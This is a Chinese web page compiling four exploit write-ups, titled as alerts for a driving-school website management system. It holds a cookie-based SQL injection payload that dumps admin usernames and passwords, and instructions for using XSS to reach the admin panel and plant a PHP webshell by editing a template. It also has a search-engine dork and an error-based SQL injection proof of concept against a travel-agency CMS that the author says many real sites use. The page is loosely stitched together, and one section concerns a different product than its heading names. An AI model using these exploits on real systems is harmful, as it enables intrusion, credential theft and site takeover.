驾校培训网站管理系统 v1.0 漏洞漏洞预警

2024-10-08

驾校培训网站管理系统 v1.0 漏洞漏洞预警(精选4篇)

驾校培训网站管理系统 v1.0 漏洞漏洞预警 篇1

<%

Set rsnews=Server.CreateObject(“ADODB.RecordSet”)

sql=“update news set hits=hits+1 where id=”&cstr(request(“id”))

conn.execute sql

单纯的reuqest(),并没用指定是request.querystring(),还是request.form,或request.cookie ().

EXP:

localhost/jiaxiao/shownews.asp

javascript.:alert(document.cookie=“id=”+escape(“107 and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11 from admin”))

驾校培训网站管理系统 v1.0 漏洞漏洞预警 篇2

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

<%

id=request.QueryString(”id“)

k=request.QueryString(”k“)

%>

<%

set rs3=server.CreateObject(”adodb.recordset“)

sql3=”select * from hlf_news where id="&id

rs3.open sql3,conn,1,1

if not rs3.eof then

%>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

驾校培训网站管理系统 v1.0 漏洞漏洞预警 篇3

漏洞文件:links.php

漏洞处在申请友情链接处的网站名称和logo地址处,因为网站名称“webname”是post获取的并且没做过滤所以xss出现了!

利用说明:xss打后台拿webshell

后台拿shell:直接在域名后面输入这段URL“admin/template_update.php?dir=default&file=config.default.php”进行模板修改!然后在模板修改上面添加一个php的一句话就可以了,然后在域名后面直接连接“/inc/templates/frontend/default/config.default.php”就可以了!

PS:xss比sql好多了,难得猜表和爆表,直接X后台! (*^__^*) 嘻嘻……

图-1

图-2

图-3

图-4

驾校培训网站管理系统 v1.0 漏洞漏洞预警 篇4

中国旅游服务网站管理系统CTSCMS,这个网站系统是我在近期发现的,使用dedecms二次开发的,织梦内核。由于忽视了官方的系统升级导致程序有很多的漏洞。近期爆出的注入漏洞都存在,历史的漏洞不知道是否存在。

Google:- CTSCMS.COM ,inurl:users/reg.php旅行社

POC:/plus/search.php?keyword=as&typeArr[111%3D@`'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`'`+]=a

后来我又发现,这套程序都是一个人在做 国内很多旅行社网站在用

很多大型旅行社网站都在用,请在法律允许的范围内测试,

保重....

上一篇:2024年度学校场地开放工作小结下一篇:期中考试后的心理调节